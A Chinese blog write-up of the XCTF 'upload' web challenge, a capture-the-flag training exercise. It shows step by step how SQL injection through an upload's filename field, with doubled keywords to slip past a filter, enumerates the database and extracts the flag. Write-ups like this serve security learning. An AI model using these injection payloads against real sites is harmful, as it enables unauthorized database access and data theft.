刘功瑞的博客-攻防世界 XCTF WEB 高手区 upload WriteUp

攻防世界 XCTF WEB 高手区 upload WriteUp

题目：

解题：

先注册个账号，登录后是一个上传页面。

使用bp测试后，发现只能上传jpg

怀疑可能是考察文件名注入，测试之后发现果然有注入。

返回到页面看到我们注入得到的库名。web_upload

继续注入表名

filename="1','2','3'),((selselectect group_concat(table_name) frfromom information_schema.tables where table_schema=database()),'2','1660'),('1.jpg"

获取字段名

filename="1','2','3'),((selselectect group_concat(column_name) frfromom information_schema.columns where table_schema=database() anandd table_name='hello_flag_is_here'),'2','1660'),('1.jpg"

获取flag

filename="1','2','3'),((selselectect i_am_flag frfromom hello_flag_is_here),'2','1660'),('1.jpg"

!!_@m_Th.e_F!lag

« 2024年5月 »
一	二	三	四	五	六	日
	1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

« 2024年5月 »

一

二

三

四

五

六

日

刘功瑞的博客

有一天你突然惊醒，发现这一切，都只不过是一场梦。

2019年10月22日

攻防世界 XCTF WEB 高手区 upload WriteUp

标签：sql注入

作者:admin , 分类:CTF , 浏览:686 , 评论:0

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.